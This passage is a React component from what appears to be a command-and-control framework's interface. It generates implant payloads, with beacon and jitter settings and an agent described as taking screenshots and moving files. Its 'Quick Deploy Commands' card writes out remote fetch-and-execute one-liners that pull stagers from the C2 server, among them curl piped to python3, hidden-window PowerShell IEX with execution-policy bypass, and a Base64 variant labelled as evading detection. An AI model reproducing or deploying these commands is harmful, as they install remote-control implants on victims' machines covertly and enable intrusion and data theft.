                    <strong style={{ color: 'var(--neon-cyan)' }}>PowerShell Agent</strong>
                    <p style={{ margin: '8px 0 0 0' }}>
                      Native Windows agent. No dependencies required.
                      Includes screenshot, file upload/download capabilities.
                      Works on Windows 7+ with PowerShell 3.0+.
                    </p>
                  </>
                )}
              </div>

              <div style={{ display: 'grid', gridTemplateColumns: '1fr 1fr', gap: 'var(--spacing-md)' }}>
                <div className="form-group">
                  <label className="form-label">Beacon Interval (s)</label>
                  <input
                    type="number"
                    className="form-input"
                    value={config.beacon_interval}
                    onChange={(e) => setConfig({ ...config, beacon_interval: parseInt(e.target.value) })}
                  />
                </div>
                <div className="form-group">
                  <label className="form-label">Jitter (%)</label>
                  <input
                    type="number"
                    className="form-input"
                    value={config.jitter}
                    onChange={(e) => setConfig({ ...config, jitter: parseInt(e.target.value) })}
                    min="0"
                    max="50"
                  />
                </div>
              </div>

              <button 
                className="btn btn-primary" 
                style={{ width: '100%', marginTop: 'var(--spacing-md)' }}
                onClick={generatePayload}
                disabled={loading}
              >
                {loading ? 'Generating...' : '⚡ Generate Payload'}
              </button>
            </div>
          </div>

          {/* Generated Payload */}
          <div className="card">
            <div className="card-header">
              <h3 className="card-title">Generated Payload</h3>
              {generatedPayload && (
                <div style={{ display: 'flex', gap: 'var(--spacing-sm)' }}>
                  <button className="btn btn-sm btn-secondary" onClick={copyToClipboard}>
                    📋 Copy
                  </button>
                  <button className="btn btn-sm btn-primary" onClick={downloadPayload}>
                    ⬇ Download {getFileExtension()}
                  </button>
                </div>
              )}
            </div>
            <div className="card-body" style={{ padding: 0 }}>
              {generatedPayload ? (
                <pre style={{ 
                  margin: 0,
                  padding: 'var(--spacing-lg)',
                  background: 'var(--bg-primary)',
                  overflow: 'auto',
                  maxHeight: '600px',
                  fontSize: '12px',
                  lineHeight: '1.5'
                }}>
                  <code>{generatedPayload}</code>
                </pre>
              ) : (
                <div style={{ 
                  textAlign: 'center', 
                  padding: '100px', 
                  color: 'var(--text-muted)' 
                }}>
                  <div style={{ fontSize: '48px', marginBottom: 'var(--spacing-md)' }}>📦</div>
                  <p>Configure options and click Generate to create a payload</p>
                </div>
              )}
            </div>
          </div>
        </div>

        {/* One-Liners */}
        {generatedPayload && (
          <div className="card" style={{ marginTop: 'var(--spacing-xl)' }}>
            <div className="card-header">
              <h3 className="card-title">Quick Deploy Commands</h3>
            </div>
            <div className="card-body">
              {config.platform === 'python' && (
                <>
                  <div className="form-group">
                    <label className="form-label">Linux/macOS (curl + python)</label>
                    <code style={{ 
                      display: 'block', 
                      background: 'var(--bg-primary)', 
                      padding: 'var(--spacing-md)',
                      borderRadius: 'var(--radius-sm)',
                      color: 'var(--neon-green)',
                      wordBreak: 'break-all'
                    }}>
                      curl -sk {getListener()?.listener_type || 'https'}://{C2_SERVER}:{getListener()?.bind_port || 443}/api/stager/py | python3
                    </code>
                  </div>
                  <div className="form-group">
                    <label className="form-label">Windows (with Python installed)</label>
                    <code style={{ 
                      display: 'block', 
                      background: 'var(--bg-primary)', 
                      padding: 'var(--spacing-md)',
                      borderRadius: 'var(--radius-sm)',
                      color: 'var(--neon-cyan)',
                      wordBreak: 'break-all'
                    }}>
                      powershell -c "(New-Object Net.WebClient).DownloadString('{getListener()?.listener_type || 'https'}://{C2_SERVER}:{getListener()?.bind_port || 443}/api/stager/py')" | python
                    </code>
                  </div>
                </>
              )}
              {config.platform === 'powershell' && (
                <>
                  <div className="form-group">
                    <label className="form-label">Windows PowerShell (One-liner, hidden window)</label>
                    <code style={{ 
                      display: 'block', 
                      background: 'var(--bg-primary)', 
                      padding: 'var(--spacing-md)',
                      borderRadius: 'var(--radius-sm)',
                      color: 'var(--neon-cyan)',
                      wordBreak: 'break-all'
                    }}>
                      powershell -nop -w hidden -ep bypass -c "IEX((New-Object Net.WebClient).DownloadString('{getListener()?.listener_type || 'https'}://{C2_SERVER}:{getListener()?.bind_port || 443}/api/stager/ps1'))"
                    </code>
                  </div>
                  <div className="form-group">
                    <label className="form-label">Windows CMD (hidden execution)</label>
                    <code style={{ 
                      display: 'block', 
                      background: 'var(--bg-primary)', 
                      padding: 'var(--spacing-md)',
                      borderRadius: 'var(--radius-sm)',
                      color: 'var(--neon-green)',
                      wordBreak: 'break-all'
                    }}>
                      start /b powershell -nop -w hidden -ep bypass -c "IEX((New-Object Net.WebClient).DownloadString('{getListener()?.listener_type || 'https'}://{C2_SERVER}:{getListener()?.bind_port || 443}/api/stager/ps1'))"
                    </code>
                  </div>
                  <div className="form-group">
                    <label className="form-label">Encoded (Base64) - Evade basic detection</label>
                    <code style={{ 
                      display: 'block', 
                      background: 'var(--bg-primary)', 
                      padding: 'var(--spacing-md)',
                      borderRadius: 'var(--radius-sm)',
                      color: 'var(--neon-orange)',
                      wordBreak: 'break-all',
                      fontSize: '11px'
                    }}>
                      powershell -nop -w hidden -ep bypass -enc {btoa(`IEX((New-Object Net.WebClient).DownloadString('${getListener()?.listener_type || 'https'}://${C2_SERVER}:${getListener()?.bind_port || 443}/api/stager/ps1'))`).slice(0, 60)}...
                    </code>
                    <p style={{ fontSize: '11px', color: 'var(--text-muted)', marginTop: '4px' }}>
                      Full encoded command will be generated by the server
                    </p>
                  </div>
                </>
              )}
            </div>
          </div>
        )}
      </div>
    </>
  );
}

export default Payloads;
